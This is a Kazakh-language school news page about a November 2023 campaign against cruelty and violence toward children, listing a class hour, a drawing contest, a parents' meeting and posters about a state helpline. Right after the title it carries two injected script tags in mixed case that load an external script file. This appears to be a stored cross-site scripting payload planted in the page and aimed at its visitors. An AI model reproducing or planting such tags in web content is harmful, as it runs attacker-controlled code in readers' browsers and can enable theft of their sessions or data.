«Қатыгездік пен зорлық-зомбылықсыз балалық шақ»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.11.2023

Ағымдағы жылдың 8 қарашасы мен 20 қарашасы аралығында мектепте «Қатыгездік пен зорлық-зомбылықсыз балалық шақ» республикалық ақпараттық науқаны өтті. Бұл акцияның мақсаты ата-аналар қоғамдастығында балаларға қатысты зорлық-зомбылық пен қатыгездік мәселелері, сондай-ақ балаларға қатысты мінез-құлық ережелерін сақтау туралы ақпараттандыруды арттыру болды. Осы акция аясында мектепте келесі іс-шаралар өткізілді:   

  1. «Қатыгездік пен зорлық-зомбылықсыз балалық шақ» атты сынып сағаты.
  2. «Балалық шақ пен балаларды қорғайық» суреттер байқауы
  3.   Ата-аналар жиналысы «Отбасы және бала тәрбиесі» тақырыбында балаларды қорғау және оң ата-ана тәрбиесіне баса назар аударады.
  4. Әлеуметтік желілерде отбасы, әйелдер және балалардың құқықтарын қорғау мәселелері бойынша «111 AMANAT» Бірыңғай мемлекеттік байланыс орталығы туралы ақпаратпен постер орналастыру.
Просмотров: 3868


Пікір қосу



Деректерді қолтаңбаға қосу